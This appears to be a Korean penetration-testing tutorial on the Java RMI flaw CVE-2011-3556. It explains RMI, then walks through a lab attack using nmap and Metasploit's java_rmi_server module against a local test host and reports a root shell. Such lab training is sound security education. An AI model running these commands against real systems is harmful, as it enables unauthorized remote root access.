[모의해킹 시스템 취약점] JAVA RMI (CVE-2011-3556)

※ RMI

분산 시스템에서 상대의 자바 객체를 호출할 수 있는 프로토콜이다. 자바 객체가 네트워크상 어느 곳에 있던 간에 서로 통신할 수 있게 해주는 기능으로, 네트워크로 연결된 다른 컴퓨터에 존재하는 메소드를 마치 내 컴퓨터에 있는 듯이 호출해서 사용하게 된다.

자바객체직렬화(Java Object Serialization)와 HTTP라는 2가지 프로토콜을 on-the-wire 형식으로 사용한다. 자바객체직렬화 프로토콜은 호출을 마샬링하고 데이터를 반환하는데 사용한다. HTTP 프로토콜은 상황에 따라 원격 메소드 호출시 "POST"를 사용하고 반환 데이터를 얻는데 사용한다. 각 프로토콜은 별도의 문법으로 문서화된다.

 

공격 실습 

 

공격자(KaliLinux) : 192.168.10.50

공격 대상(meta) : 192.168.10.134

 

[KaliLinux]

㉮ 공격 대상 시스템에 JAVA RMI 를 사용하고 있는지 확인한다.

# nmap -sV 192.168.10.134

 

㉯ msfconsole 을 사용해서 공격을 시도한다.

# msfconsole -q

msf6 > use exploit/multi/misc/java_rmi_server

msf6 > set RHOSTS 192.168.10.134

msf6 > run

root 권한의 shell을 획득한 것을 볼 수 있다.